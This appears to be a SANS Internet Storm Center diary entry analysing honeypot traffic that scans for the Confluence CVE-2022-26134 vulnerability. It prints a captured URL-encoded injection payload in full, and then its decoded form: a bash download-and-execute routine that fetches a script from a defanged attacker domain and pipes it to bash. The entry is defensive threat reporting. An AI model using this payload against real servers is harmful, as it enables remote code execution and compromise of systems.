ISC Stormcast For Friday, March 1st, 2024

    Scanning for Confluence CVE-2022-26134

    Published: 2024-03-01
    Last Updated: 2024-03-01 00:21:20 UTC
    by Confluence,CVE-2022-26134,scan,DShield, (Version: 1)
    0 comment(s)

    I have added daemonlogger [1] for packet capture and Arkime [2] to visualize the packets captured by my DShield sensor and started noticing this activity that so far only gone to TCP/8090 which is URL and base64 encoded. The DShield sensor started capturing this activity on the 12 February 2024 inbound from various IPs from various locations.

    Activity Overview

    Using CyberChef [3] I decoded this URL:$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27echo%20dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw%2BIi9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA%2BJjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM%2BJi0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/

    CyberChef Step 1 - URL Decode

    CyberChef Step 2 - From Base64

    This is the final result of decoding this URL where the actor is attempting to initiate the Nashorn Java Engine, activity has similarity to this article [5] CounterCraft.${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo 
    vurl() {
        IFS=/ read -r proto x host query <<<"$1"
        exec 3<>"/dev/tcp/${host}/${PORT:-80}"
        echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
        (while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat ) <&3
        exec 3>&-
    vurl http://b.9-9-8[.]com/brysj/|bash

    The above URL while submitted to a sandbox dropped two hashes the first is known as a downloaded shell while the second is still unknown. 



    d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6e [7]


    Guy Bruneau IPSS Inc.
    My Handler Page
    Twitter: GuyBruneau
    gbruneau at isc dot sans dot edu

    0 comment(s)


      Diary Archives